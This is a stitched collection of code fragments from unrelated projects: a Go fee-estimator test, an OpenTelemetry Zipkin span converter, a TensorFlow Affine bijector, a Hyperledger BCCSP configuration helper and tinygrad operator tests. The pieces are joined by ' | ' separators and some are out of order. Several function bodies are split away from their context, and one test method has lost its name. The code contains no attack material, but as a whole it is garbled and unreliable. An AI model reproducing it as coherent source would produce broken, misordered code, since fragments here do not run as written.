txPerBlock := uint32(5)
binSize := uint32(6)
maxReplacements := uint32(4)
stepsBack := 2
rounds := 30
eft := estimateFeeTester{ef: newTestFeeEstimator(binSize, maxReplacements, uint32(stepsBack)), t: t}
var txHistory [][]*TxDesc
estimateHistory := [][estimateFeeDepth]SotoPerKilobyte{eft.estimates()}
for round := 0; round < rounds; round++ {
// Go forward a few rounds.
for step := 0; step <= stepsBack; step++ {
txHistory, estimateHistory =
eft.round(txHistory, estimateHistory, txPerRound, txPerBlock)
}
// Now go back.
for step := 0; step < stepsBack; step++ {
eft.rollback()
// After rolling back, we should have the same estimated
// fees as before.
expected := estimateHistory[len(estimateHistory)-step-2]
estimates := eft.estimates()
// Ensure that these are both the same.
for i := 0; i < estimateFeeDepth; i++ {
if expected[i] != estimates[i] {
t.Errorf("Rollback value mismatch. Expected %f, got %f. ",
expected[i], estimates[i])
return
}
}
}
// Erase history.
txHistory = txHistory[0 : len(txHistory)-stepsBack]
estimateHistory = estimateHistory[0 : len(estimateHistory)-stepsBack]
}
}
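// checkSaveAndRestore serializes the estimator, restores it from the saved
// state and verifies that the state and the estimates survive the round trip.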
func (eft *estimateFeeTester) checkSaveAndRestore(
previousEstimates [estimateFeeDepth]SotoPerKilobyte) {
// Get the save state.
save := eft.ef.Save()
// Save and restore database.
var err error
eft.ef, err = RestoreFeeEstimator(save)
if err != nil {
eft.t.Fatalf("Could not restore database: %s", err)
}
// Save again and check that it matches the previous one.
redo := eft.ef.Save()
if !bytes.Equal(save, redo) {
eft.t.Fatalf("Restored states do not match: %v %v", save, redo)
}
// Check that the results match.
newEstimates := eft.estimates()
for i, prev := range previousEstimates {
if prev != newEstimates[i] {
eft.t.Error("Mismatch in estimate ", i, " after restore; got ", newEstimates[i], " but expected ", prev)
}
}
}
// TestSave tests saving and restoring to a []byte.
func TestDatabase(t *testing.T) {
txPerRound := uint32(7)
txPerBlock := uint32(5)
binSize := uint32(6)
maxReplacements := uint32(4)
rounds := 8
eft := estimateFeeTester{ef: newTestFeeEstimator(binSize, maxReplacements, uint32(rounds)+1), t: t}
var txHistory [][]*TxDesc
estimateHistory := [][estimateFeeDepth]SotoPerKilobyte{eft.estimates()}
for round := 0; round < rounds; round++ {
eft.checkSaveAndRestore(estimateHistory[len(estimateHistory)-1])
// Go forward one step.
txHistory, estimateHistory =
eft.round(txHistory, estimateHistory, txPerRound, txPerBlock)
}
// Reverse the process and try again.
for round := 1; round <= rounds; round++ {
eft.rollback()
eft.checkSaveAndRestore(estimateHistory[len(estimateHistory)-round-1])
}
} | for i := uint32(1); i <= estimateFeeDepth; i++ {
estimated, _ := ef.EstimateFee(i) |
model.go | // Copyright The OpenTelemetry Authors
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package zipkin // import "go.opentelemetry.io/otel/exporters/zipkin"
import (
"encoding/binary"
"encoding/json"
"fmt"
"net"
"strconv"
zkmodel "github.com/openzipkin/zipkin-go/model"
"go.opentelemetry.io/otel/attribute"
"go.opentelemetry.io/otel/codes"
"go.opentelemetry.io/otel/sdk/resource"
tracesdk "go.opentelemetry.io/otel/sdk/trace"
semconv "go.opentelemetry.io/otel/semconv/v1.10.0"
"go.opentelemetry.io/otel/trace"
)
const (
keyInstrumentationLibraryName = "otel.library.name"
keyInstrumentationLibraryVersion = "otel.library.version"
keyPeerHostname attribute.Key = "peer.hostname"
keyPeerAddress attribute.Key = "peer.address"
)
var defaultServiceName string
func init() {
// fetch service.name from default resource for backup
defaultResource := resource.Default()
if value, exists := defaultResource.Set().Value(semconv.ServiceNameKey); exists {
defaultServiceName = value.AsString()
}
}
// SpanModels converts OpenTelemetry spans into Zipkin model spans.
// This is used for exporting to Zipkin compatible tracing services.
func SpanModels(batch []tracesdk.ReadOnlySpan) []zkmodel.SpanModel {
models := make([]zkmodel.SpanModel, 0, len(batch))
for _, data := range batch {
models = append(models, toZipkinSpanModel(data))
}
return models
}
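// getServiceName returns the service.name resource attribute, falling back to
// the default resource's service name.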
func getServiceName(attrs []attribute.KeyValue) string {
for _, kv := range attrs {
if kv.Key == semconv.ServiceNameKey {
return kv.Value.AsString()
}
}
return defaultServiceName
}
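// toZipkinSpanModel converts a single OpenTelemetry span into the equivalent
// Zipkin span model.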
func toZipkinSpanModel(data tracesdk.ReadOnlySpan) zkmodel.SpanModel {
return zkmodel.SpanModel{
SpanContext: toZipkinSpanContext(data),
Name: data.Name(),
Kind: toZipkinKind(data.SpanKind()),
Timestamp: data.StartTime(),
Duration: data.EndTime().Sub(data.StartTime()),
Shared: false,
LocalEndpoint: &zkmodel.Endpoint{
ServiceName: getServiceName(data.Resource().Attributes()),
},
RemoteEndpoint: toZipkinRemoteEndpoint(data),
Annotations: toZipkinAnnotations(data.Events()),
Tags: toZipkinTags(data),
}
}
func toZipkinSpanContext(data tracesdk.ReadOnlySpan) zkmodel.SpanContext {
return zkmodel.SpanContext{
TraceID: toZipkinTraceID(data.SpanContext().TraceID()),
ID: toZipkinID(data.SpanContext().SpanID()),
ParentID: toZipkinParentID(data.Parent().SpanID()),
Debug: false,
Sampled: nil,
Err: nil,
}
}
func toZipkinTraceID(traceID trace.TraceID) zkmodel.TraceID {
return zkmodel.TraceID{
High: binary.BigEndian.Uint64(traceID[:8]),
Low: binary.BigEndian.Uint64(traceID[8:]),
}
}
func toZipkinID(spanID trace.SpanID) zkmodel.ID {
return zkmodel.ID(binary.BigEndian.Uint64(spanID[:]))
}
func toZipkinParentID(spanID trace.SpanID) *zkmodel.ID {
if spanID.IsValid() {
id := toZipkinID(spanID)
return &id
}
return nil
}
func toZipkinKind(kind trace.SpanKind) zkmodel.Kind {
switch kind {
case trace.SpanKindUnspecified:
return zkmodel.Undetermined
case trace.SpanKindInternal:
// The spec says we should set the kind to nil, but
// the model does not allow that.
return zkmodel.Undetermined
case trace.SpanKindServer:
return zkmodel.Server
case trace.SpanKindClient:
return zkmodel.Client
case trace.SpanKindProducer:
return zkmodel.Producer
case trace.SpanKindConsumer:
return zkmodel.Consumer
}
return zkmodel.Undetermined
}
func toZipkinAnnotations(events []tracesdk.Event) []zkmodel.Annotation {
if len(events) == 0 {
return nil
}
annotations := make([]zkmodel.Annotation, 0, len(events))
for _, event := range events {
value := event.Name
if len(event.Attributes) > 0 {
jsonString := attributesToJSONMapString(event.Attributes)
if jsonString != "" {
value = fmt.Sprintf("%s: %s", event.Name, jsonString)
}
}
annotations = append(annotations, zkmodel.Annotation{
Timestamp: event.Time,
Value: value,
})
}
return annotations
}
func attributesToJSONMapString(attributes []attribute.KeyValue) string {
m := make(map[string]interface{}, len(attributes))
for _, a := range attributes {
m[(string)(a.Key)] = a.Value.AsInterface()
}
// if an error happens, the result will be an empty string
jsonBytes, _ := json.Marshal(m)
return (string)(jsonBytes)
}
// attributeToStringPair serializes each attribute to a string pair.
func attributeToStringPair(kv attribute.KeyValue) (string, string) {
switch kv.Value.Type() {
// For slice attributes, serialize as JSON list string. | data, _ := json.Marshal(kv.Value.AsInt64Slice())
return (string)(kv.Key), (string)(data)
case attribute.FLOAT64SLICE:
data, _ := json.Marshal(kv.Value.AsFloat64Slice())
return (string)(kv.Key), (string)(data)
case attribute.STRINGSLICE:
data, _ := json.Marshal(kv.Value.AsStringSlice())
return (string)(kv.Key), (string)(data)
default:
return (string)(kv.Key), kv.Value.Emit()
}
}
// extraZipkinTags are those that may be added to every outgoing span.
var extraZipkinTags = []string{
"otel.status_code",
keyInstrumentationLibraryName,
keyInstrumentationLibraryVersion,
}
func toZipkinTags(data tracesdk.ReadOnlySpan) map[string]string {
attr := data.Attributes()
resourceAttr := data.Resource().Attributes()
m := make(map[string]string, len(attr)+len(resourceAttr)+len(extraZipkinTags))
for _, kv := range attr {
k, v := attributeToStringPair(kv)
m[k] = v
}
for _, kv := range resourceAttr {
k, v := attributeToStringPair(kv)
m[k] = v
}
if data.Status().Code != codes.Unset {
m["otel.status_code"] = data.Status().Code.String()
}
if data.Status().Code == codes.Error {
m["error"] = data.Status().Description
} else {
delete(m, "error")
}
if il := data.InstrumentationLibrary(); il.Name != "" {
m[keyInstrumentationLibraryName] = il.Name
if il.Version != "" {
m[keyInstrumentationLibraryVersion] = il.Version
}
}
if len(m) == 0 {
return nil
}
return m
}
// Rank determines selection order for remote endpoint. See the specification
// https://github.com/open-telemetry/opentelemetry-specification/blob/v1.0.1/specification/trace/sdk_exporters/zipkin.md#otlp---zipkin
var remoteEndpointKeyRank = map[attribute.Key]int{
semconv.PeerServiceKey: 0,
semconv.NetPeerNameKey: 1,
semconv.NetPeerIPKey: 2,
keyPeerHostname: 3,
keyPeerAddress: 4,
semconv.HTTPHostKey: 5,
semconv.DBNameKey: 6,
}
func toZipkinRemoteEndpoint(data tracesdk.ReadOnlySpan) *zkmodel.Endpoint {
// Should be set only for client or producer kind
if sk := data.SpanKind(); sk != trace.SpanKindClient && sk != trace.SpanKindProducer {
return nil
}
attr := data.Attributes()
var endpointAttr attribute.KeyValue
for _, kv := range attr {
rank, ok := remoteEndpointKeyRank[kv.Key]
if !ok {
continue
}
currentKeyRank, ok := remoteEndpointKeyRank[endpointAttr.Key]
if ok && rank < currentKeyRank {
endpointAttr = kv
} else if !ok {
endpointAttr = kv
}
}
if endpointAttr.Key == "" {
return nil
}
if endpointAttr.Key != semconv.NetPeerIPKey &&
endpointAttr.Value.Type() == attribute.STRING {
return &zkmodel.Endpoint{
ServiceName: endpointAttr.Value.AsString(),
}
}
return remoteEndpointPeerIPWithPort(endpointAttr.Value.AsString(), attr)
}
// Handles `net.peer.ip` remote endpoint separately (should include `net.peer.port`
// as well, if available).
func remoteEndpointPeerIPWithPort(peerIP string, attrs []attribute.KeyValue) *zkmodel.Endpoint {
ip := net.ParseIP(peerIP)
if ip == nil {
return nil
}
endpoint := &zkmodel.Endpoint{}
// Determine if IPv4 or IPv6
if ip.To4() != nil {
endpoint.IPv4 = ip
} else {
endpoint.IPv6 = ip
}
for _, kv := range attrs {
if kv.Key == semconv.NetPeerPortKey {
port, _ := strconv.ParseUint(kv.Value.Emit(), 10, 16)
endpoint.Port = uint16(port)
return endpoint
}
}
return endpoint
} | case attribute.BOOLSLICE:
data, _ := json.Marshal(kv.Value.AsBoolSlice())
return (string)(kv.Key), (string)(data)
case attribute.INT64SLICE: |
affine_impl.py | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Affine bijector."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.contrib import linalg
from tensorflow.contrib.distributions.python.ops import distribution_util
from tensorflow.contrib.distributions.python.ops.shape import _DistributionShape
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops.distributions import bijector
__all__ = [
"Affine",
]
def _as_tensor(x, name):
"""Convenience to convert to `Tensor` or leave as `None`."""
return None if x is None else ops.convert_to_tensor(x, name=name)
class Affine(bijector.Bijector):
"""Compute `Y = g(X; shift, scale) = scale @ X + shift`.
Here `scale = c * I + diag(D1) + tril(L) + V @ diag(D2) @ V.T`.
In TF parlance, the `scale` term is logically equivalent to:
```python
scale = (
scale_identity_multiplier * tf.diag(tf.ones(d)) +
tf.diag(scale_diag) +
scale_tril +
scale_perturb_factor @ diag(scale_perturb_diag) @
tf.transpose([scale_perturb_factor])
)
```
The `scale` term is applied without necessarily materializing constituent
matrices, i.e., the matmul is [matrix-free](
https://en.wikipedia.org/wiki/Matrix-free_methods) when possible.
Examples:
```python
# Y = X
b = Affine()
# Y = X + shift
b = Affine(shift=[1., 2, 3])
# Y = 2 * I @ X.T + shift
b = Affine(shift=[1., 2, 3],
scale_identity_multiplier=2.)
# Y = tf.diag(d1) @ X.T + shift
b = Affine(shift=[1., 2, 3],
scale_diag=[-1., 2, 1]) # Implicitly 3x3.
# Y = (I + v * v.T) @ X.T + shift
b = Affine(shift=[1., 2, 3],
scale_perturb_factor=[[1., 0],
[0, 1],
[1, 1]])
# Y = (diag(d1) + v * diag(d2) * v.T) @ X.T + shift
b = Affine(shift=[1., 2, 3],
scale_diag=[1., 3, 3], # Implicitly 3x3.
scale_perturb_diag=[2., 1], # Implicitly 2x2.
scale_perturb_factor=[[1., 0],
[0, 1],
[1, 1]])
```
"""
def __init__(self,
shift=None,
scale_identity_multiplier=None,
scale_diag=None,
scale_tril=None,
scale_perturb_factor=None,
scale_perturb_diag=None,
event_ndims=1,
validate_args=False,
name="affine"):
"""Instantiates the `Affine` bijector.
This `Bijector` is initialized with `shift` `Tensor` and `scale` arguments,
giving the forward operation:
```none
Y = g(X) = scale @ X + shift
```
where the `scale` term is logically equivalent to:
```python
scale = (
scale_identity_multiplier * tf.diag(tf.ones(d)) +
tf.diag(scale_diag) +
scale_tril +
scale_perturb_factor @ diag(scale_perturb_diag) @
tf.transpose([scale_perturb_factor])
)
```
If none of `scale_identity_multiplier`, `scale_diag`, or `scale_tril` are
specified then `scale += IdentityMatrix`. Otherwise specifying a
`scale` argument has the semantics of `scale += Expand(arg)`, i.e.,
`scale_diag != None` means `scale += tf.diag(scale_diag)`.
Args:
shift: Floating-point `Tensor`. If this is set to `None`, no shift is
applied.
scale_identity_multiplier: floating point rank 0 `Tensor` representing a
scaling done to the identity matrix.
When `scale_identity_multiplier = scale_diag = scale_tril = None` then
`scale += IdentityMatrix`. Otherwise no scaled-identity-matrix is added
to `scale`.
scale_diag: Floating-point `Tensor` representing the diagonal matrix.
`scale_diag` has shape [N1, N2, ... k], which represents a k x k
diagonal matrix.
When `None` no diagonal term is added to `scale`.
scale_tril: Floating-point `Tensor` representing the lower triangular matrix.
`scale_tril` has shape [N1, N2, ... k, k], which represents a k x k
lower triangular matrix.
When `None` no `scale_tril` term is added to `scale`.
The upper triangular elements above the diagonal are ignored.
scale_perturb_factor: Floating-point `Tensor` representing factor matrix
with last two dimensions of shape `(k, r)`. When `None`, no rank-r
update is added to `scale`.
scale_perturb_diag: Floating-point `Tensor` representing the diagonal
matrix. `scale_perturb_diag` has shape [N1, N2, ... r], which
represents an `r x r` diagonal matrix. When `None` low rank updates will
take the form `scale_perturb_factor * scale_perturb_factor.T`.
event_ndims: Scalar `int` `Tensor` indicating the number of dimensions
associated with a particular draw from the distribution. Must be 0 or 1.
validate_args: Python `bool` indicating whether arguments should be
checked for correctness.
name: Python `str` name given to ops managed by this object.
Raises:
ValueError: if `perturb_diag` is specified but not `perturb_factor`.
TypeError: if `shift` has different `dtype` from `scale` arguments.
"""
self._graph_parents = []
self._name = name
self._validate_args = validate_args
# Ambiguous definition of low rank update.
if scale_perturb_diag is not None and scale_perturb_factor is None:
raise ValueError("When scale_perturb_diag is specified, "
"scale_perturb_factor must be specified.")
# Special case, only handling a scaled identity matrix. We don't know its
# dimensions, so this is special cased.
# We don't check identity_multiplier, since below we set it to 1. if all
# other scale args are None.
self._is_only_identity_multiplier = (scale_tril is None and
scale_diag is None and
scale_perturb_factor is None)
with self._name_scope("init", values=[
shift, scale_identity_multiplier, scale_diag, scale_tril,
scale_perturb_diag, scale_perturb_factor]):
event_ndims = ops.convert_to_tensor(event_ndims, name="event_ndims")
event_ndims_const = tensor_util.constant_value(event_ndims)
if event_ndims_const is not None and event_ndims_const not in (0, 1):
raise ValueError("event_ndims(%s) was not 0 or 1" % event_ndims_const)
else:
if validate_args:
# Shape tool will catch if event_ndims is negative.
event_ndims = control_flow_ops.with_dependencies(
[check_ops.assert_less(
event_ndims, 2, message="event_ndims must be 0 or 1")],
event_ndims)
if event_ndims_const == 0 and not self._is_only_identity_multiplier:
raise ValueError(
"If event_ndims == 0, the only scale argument you can pass is "
"scale_identity_multiplier. All others operate on vectors.")
# In the absence of `loc` and `scale`, we'll assume `dtype` is `float32`.
dtype = dtypes.float32
if shift is not None:
shift = ops.convert_to_tensor(shift, name="shift")
dtype = shift.dtype.base_dtype
self._shift = shift
# When no args are specified, pretend the scale matrix is the identity
# matrix.
if (self._is_only_identity_multiplier and
scale_identity_multiplier is None):
scale_identity_multiplier = ops.convert_to_tensor(1., dtype=dtype)
# self._create_scale_operator returns a LinearOperator in all cases
# except if self._is_only_identity_multiplier; in which case it
# returns a scalar Tensor.
scale = self._create_scale_operator(
identity_multiplier=scale_identity_multiplier,
diag=scale_diag,
tril=scale_tril,
perturb_diag=scale_perturb_diag,
perturb_factor=scale_perturb_factor,
shift=shift,
validate_args=validate_args)
if scale.dtype is not None:
dtype = scale.dtype.base_dtype
if scale is not None and not self._is_only_identity_multiplier:
if (shift is not None and
shift.dtype.base_dtype != scale.dtype.base_dtype):
raise TypeError(
"shift.dtype({}) is incompatible with scale.dtype({}).".format(
shift.dtype, scale.dtype))
if scale.tensor_rank is not None:
batch_ndims = scale.tensor_rank - 2
else:
batch_ndims = scale.tensor_rank_tensor() - 2
else:
# We won't need shape inference when scale is None or when scale is a
# scalar.
batch_ndims = 0
self._scale = scale
self._shaper = _DistributionShape(
batch_ndims=batch_ndims,
event_ndims=event_ndims,
validate_args=validate_args)
super(Affine, self).__init__(
event_ndims=event_ndims,
graph_parents=(
[event_ndims] +
[self._scale] if tensor_util.is_tensor(self._scale)
else self._scale.graph_parents +
[self._shift] if self._shift is not None else []),
is_constant_jacobian=True,
dtype=dtype,
validate_args=validate_args,
name=name)
def _create_scale_operator(self, identity_multiplier, diag, tril,
perturb_diag, perturb_factor, shift,
validate_args):
"""Construct `scale` from various components.
Args:
identity_multiplier: floating point rank 0 `Tensor` representing a scaling
done to the identity matrix.
diag: Floating-point `Tensor` representing the diagonal matrix.
`scale_diag` has shape [N1, N2, ... k], which represents a k x k
diagonal matrix.
tril: Floating-point `Tensor` representing the lower triangular matrix.
`scale_tril` has shape [N1, N2, ... k, k], which represents a k x k lower
triangular matrix.
perturb_diag: Floating-point `Tensor` representing the diagonal matrix of
the low rank update.
perturb_factor: Floating-point `Tensor` representing factor matrix.
shift: Floating-point `Tensor` representing `shift` in `scale @ X + shift`.
validate_args: Python `bool` indicating whether arguments should be
checked for correctness.
Returns:
scale. In the case of scaling by a constant, scale is a
floating point `Tensor`. Otherwise, scale is a `LinearOperator`.
Raises:
ValueError: if all of `tril`, `diag` and `identity_multiplier` are `None`.
"""
identity_multiplier = _as_tensor(identity_multiplier, "identity_multiplier")
diag = _as_tensor(diag, "diag")
tril = _as_tensor(tril, "tril")
perturb_diag = _as_tensor(perturb_diag, "perturb_diag")
perturb_factor = _as_tensor(perturb_factor, "perturb_factor")
# If possible, use the low rank update to infer the shape of
# the identity matrix, when scale represents a scaled identity matrix
# with a low rank update.
shape_hint = None
if perturb_factor is not None:
shape_hint = distribution_util.dimension_size(perturb_factor, axis=-2)
if self._is_only_identity_multiplier:
if validate_args:
return control_flow_ops.with_dependencies(
[check_ops.assert_none_equal(
identity_multiplier,
array_ops.zeros([], identity_multiplier.dtype),
["identity_multiplier should be non-zero."])],
identity_multiplier)
return identity_multiplier
scale = distribution_util.make_tril_scale(
loc=shift,
scale_tril=tril,
scale_diag=diag,
scale_identity_multiplier=identity_multiplier,
validate_args=validate_args,
assert_positive=False,
shape_hint=shape_hint)
if perturb_factor is not None:
return linalg.LinearOperatorUDVHUpdate(
scale,
u=perturb_factor,
diag_update=perturb_diag,
is_diag_update_positive=perturb_diag is None,
is_non_singular=True, # Implied by is_positive_definite=True.
is_self_adjoint=True,
is_positive_definite=True,
is_square=True)
return scale
@property
def shift(self):
"""The `shift` `Tensor` in `Y = scale @ X + shift`."""
return self._shift
@property
def scale(self):
"""The `scale` `LinearOperator` in `Y = scale @ X + shift`."""
return self._scale
def _forward(self, x):
y = x
if self._is_only_identity_multiplier:
y *= self._scale
if self.shift is not None:
return y + self.shift
return y
y, sample_shape = self._shaper.make_batch_of_event_sample_matrices(
y, expand_batch_dim=False)
with ops.control_dependencies(self._maybe_check_scale() if
self.validate_args else []):
y = self.scale.matmul(y)
y = self._shaper.undo_make_batch_of_event_sample_matrices(
y, sample_shape, expand_batch_dim=False)
if self.shift is not None:
y += self.shift
return y
def _inverse(self, y):
x = y
if self.shift is not None:
x -= self.shift
if self._is_only_identity_multiplier:
|
x, sample_shape = self._shaper.make_batch_of_event_sample_matrices(
x, expand_batch_dim=False)
# Solve fails if the op is singular so we may safely skip this assertion.
x = self.scale.solve(x)
x = self._shaper.undo_make_batch_of_event_sample_matrices(
x, sample_shape, expand_batch_dim=False)
return x
def _inverse_log_det_jacobian(self, y):
return -self._forward_log_det_jacobian(y)
def _forward_log_det_jacobian(self, x):
if self._is_only_identity_multiplier:
# We don't pad in this case and instead let the fldj be applied
# via broadcast.
event_size = distribution_util.pick_vector(
math_ops.equal(self._shaper.event_ndims, 0),
[1], array_ops.shape(x))[-1]
event_size = math_ops.cast(event_size, dtype=self._scale.dtype)
return math_ops.log(math_ops.abs(self._scale)) * event_size
return self.scale.log_abs_determinant()
def _maybe_check_scale(self):
try:
return [self.scale.assert_non_singular()]
except NotImplementedError:
pass
return []
| return x / self._scale |
configurebccsp.go | // +build pkcs11
/*
Copyright IBM Corp. All Rights Reserved.
SPDX-License-Identifier: Apache-2.0
*/
package util
import (
"path"
"strings"
"github.com/cloudflare/cfssl/log"
"github.com/hyperledger/fabric/bccsp/factory"
"github.com/hyperledger/fabric/bccsp/pkcs11"
"github.com/pkg/errors"
)
// ConfigureBCCSP configures BCCSP using the options in optsPtr, filling in defaults and resolving the keystore path against mspDir and file paths against homeDir.
func ConfigureBCCSP(optsPtr **factory.FactoryOpts, mspDir, homeDir string) error {
var err error
if optsPtr == nil {
return errors.New("nil argument not allowed")
}
opts := *optsPtr
if opts == nil {
opts = &factory.FactoryOpts{}
}
if opts.ProviderName == "" {
opts.ProviderName = "SW"
}
if strings.ToUpper(opts.ProviderName) == "SW" {
if opts.SwOpts == nil {
opts.SwOpts = &factory.SwOpts{}
}
if opts.SwOpts.HashFamily == "" {
opts.SwOpts.HashFamily = "SHA2"
}
if opts.SwOpts.SecLevel == 0 {
opts.SwOpts.SecLevel = 256
}
if opts.SwOpts.FileKeystore == nil {
opts.SwOpts.FileKeystore = &factory.FileKeystoreOpts{}
}
// The mspDir overrides the KeyStorePath; if neither is set, fall back to the default
if mspDir != "" {
opts.SwOpts.FileKeystore.KeyStorePath = path.Join(mspDir, "keystore")
} else if opts.SwOpts.FileKeystore.KeyStorePath == "" {
opts.SwOpts.FileKeystore.KeyStorePath = path.Join("msp", "keystore")
}
} else if strings.ToUpper(opts.ProviderName) == "GMSW" {
if opts.SwOpts == nil {
opts.SwOpts = &factory.SwOpts{}
}
if opts.SwOpts.HashFamily == "" {
opts.SwOpts.HashFamily = "SHA2"
}
if opts.SwOpts.SecLevel == 0 {
opts.SwOpts.SecLevel = 256
}
if opts.SwOpts.FileKeystore == nil {
opts.SwOpts.FileKeystore = &factory.FileKeystoreOpts{}
}
// The mspDir overrides the KeyStorePath; if neither is set, fall back to the default
if mspDir != "" {
opts.SwOpts.FileKeystore.KeyStorePath = path.Join(mspDir, "keystore")
} else if opts.SwOpts.FileKeystore.KeyStorePath == "" {
opts.SwOpts.FileKeystore.KeyStorePath = path.Join("msp", "keystore")
}
}
err = makeFileNamesAbsolute(opts, homeDir)
if err != nil {
return errors.WithMessage(err, "Failed to make BCCSP files absolute")
}
log.Debugf("Initializing BCCSP: %+v", opts)
if opts.SwOpts != nil {
log.Debugf("Initializing BCCSP with software options %+v", opts.SwOpts)
}
if opts.Pkcs11Opts != nil {
log.Debugf("Initializing BCCSP with PKCS11 options %+v", sanitizePKCS11Opts(*opts.Pkcs11Opts))
}
*optsPtr = opts
return nil
}
// redacts label and pin from PKCS11 opts
func sanitizePKCS11Opts(opts pkcs11.PKCS11Opts) pkcs11.PKCS11Opts {
mask := strings.Repeat("*", 6)
opts.Pin = mask
opts.Label = mask
return opts | } |
|
test_ops.py | import os
import torch
import numpy as np
import unittest
import timeit
import functools
from tinygrad.tensor import Tensor, DEFAULT_DEVICE, Device
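# Runs torch_fxn and tinygrad_fxn on matching random inputs, compares the forward
# (and optionally backward) results, and prints rough timings for both.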
def helper_test_op(shps, torch_fxn, tinygrad_fxn, atol=1e-6, rtol=1e-3, grad_atol=1e-6, grad_rtol=1e-3, forward_only=False, vals=None, a=-0.5, b=20):
torch.manual_seed(0)
if shps is None:
ts = [torch.tensor(x, requires_grad=True) for x in vals]
else:
ts = [torch.tensor((np.random.random(size=x).astype(np.float32)+a)*b, requires_grad=True) for x in shps]
tst = [Tensor(x.detach().numpy()) for x in ts]
out = torch_fxn(*ts)
ret = tinygrad_fxn(*tst)
np.testing.assert_allclose(ret.cpu().data, out.detach().numpy(), atol=atol, rtol=rtol)
if not forward_only:
out.mean().backward()
ret.mean().backward()
for t, tt in zip(ts, tst):
np.testing.assert_allclose(t.grad, tt.cpu().grad.data, atol=grad_atol, rtol=grad_rtol)
# speed
torch_fp = timeit.Timer(functools.partial(torch_fxn, *ts)).timeit(5) * 1000/5
tinygrad_fp = timeit.Timer(functools.partial(tinygrad_fxn, *tst)).timeit(5) * 1000/5
if not forward_only:
torch_fbp = timeit.Timer(functools.partial(lambda f,x: f(*x).mean().backward(), torch_fxn, ts)).timeit(5) * 1000/5
tinygrad_fbp = timeit.Timer(functools.partial(lambda f,x: f(*x).mean().backward(), tinygrad_fxn, tst)).timeit(5) * 1000/5
else:
torch_fbp, tinygrad_fbp = np.nan, np.nan
print("testing %30r torch/tinygrad fp: %.2f / %.2f ms bp: %.2f / %.2f ms" % (shps, torch_fp, tinygrad_fp, torch_fbp-torch_fp, tinygrad_fbp-tinygrad_fp))
class TestOps(unittest.TestCase):
def test_add(self):
helper_test_op([(45,65), (45,65)], lambda x,y: x+y, Tensor.add)
def test_sub(self):
helper_test_op([(45,65), (45,65)], lambda x,y: x-y, Tensor.sub)
def test_mul(self):
helper_test_op([(45,65), (45,65)], lambda x,y: x*y, Tensor.mul)
def | (self):
helper_test_op([(45,65), (45,65)], lambda x,y: x/y, Tensor.div)
def test_pow(self):
helper_test_op([(45,65), (45,65)], lambda x,y: x**y, Tensor.pow, a=0)
def test_sqrt(self):
helper_test_op([(45,65)], lambda x: x.sqrt(), Tensor.sqrt, a=0)
def test_relu(self):
helper_test_op([(45,65)], lambda x: x.relu(), Tensor.relu)
def test_leakyrelu(self):
helper_test_op([(45,65)], lambda x: torch.nn.functional.leaky_relu(x,0.01), Tensor.leakyrelu)
def test_abs(self):
helper_test_op([(45,65)], lambda x: torch.abs(x), Tensor.abs)
def test_log(self):
helper_test_op([(45,65)], lambda x: torch.log(x), Tensor.log)
def test_exp(self):
helper_test_op([(45,65)], lambda x: torch.exp(x), Tensor.exp)
def test_sign(self):
helper_test_op([(45,65)], lambda x: torch.sign(x), Tensor.sign)
def test_sigmoid(self):
helper_test_op([(45,65)], lambda x: x.sigmoid(), Tensor.sigmoid)
def test_softplus(self):
helper_test_op([(45,65)], lambda x: torch.nn.functional.softplus(x), Tensor.softplus, atol=1e-6, grad_atol=1e-6)
def test_relu6(self):
helper_test_op([(45,65)], lambda x: torch.nn.functional.relu6(x), Tensor.relu6)
def test_hardswish(self):
helper_test_op([(45,65)], lambda x: torch.nn.functional.hardswish(x), Tensor.hardswish, atol=1e-6, grad_atol=1e-6)
def test_mish(self):
def _mish_pytorch(x):
return x*torch.tanh(torch.nn.functional.softplus(x))
helper_test_op([(45,65)], _mish_pytorch, Tensor.mish, atol=1e-4)
def test_dot(self):
helper_test_op([(45,65), (65,100)], lambda x,y: x.matmul(y), Tensor.dot, atol=1e-4)
def test_multidot(self):
helper_test_op([(10,45,65), (10,65,45)], lambda x,y: x @ y, Tensor.dot, atol=1e-4)
helper_test_op([(3,3,45,65), (3,3,65,45)], lambda x,y: x @ y, Tensor.dot, atol=1e-4)
def test_sum(self):
helper_test_op([(45,3)], lambda x: x.sum(), Tensor.sum)
helper_test_op([(3,4,5,6)], lambda x: x.sum(axis=(1,2)), lambda x: Tensor.sum(x, axis=(1,2)))
helper_test_op([(3,4,5,6)], lambda x: x.sum(axis=1), lambda x: Tensor.sum(x, axis=1))
def test_max(self):
helper_test_op([(45,3)], lambda x: x.max(), Tensor.max)
helper_test_op([(45,3)], lambda x: x.max().mul(0.5), lambda x: Tensor.max(x).mul(0.5))
helper_test_op(None, lambda x: x.max().mul(0.5), lambda x: Tensor.max(x).mul(0.5),
vals=[
[[1.0,1.0,0.0,1.0]],
])
helper_test_op([(3,4,5,6)], lambda x: x.max(axis=1)[0], lambda x: Tensor.max(x, axis=1))
def test_mean_axis(self):
helper_test_op([(3,4,5,6)], lambda x: x.mean(axis=(1,2)), lambda x: Tensor.mean(x, axis=(1,2)))
def test_logsoftmax(self):
helper_test_op([(45,65)], lambda x: torch.nn.LogSoftmax(dim=1)(x), Tensor.logsoftmax, atol=1e-7, grad_atol=1e-7)
def test_tanh(self):
helper_test_op([(45,65)], lambda x: x.tanh(), Tensor.tanh, atol=1e-6, grad_atol=1e-6)
def test_topo_sort(self):
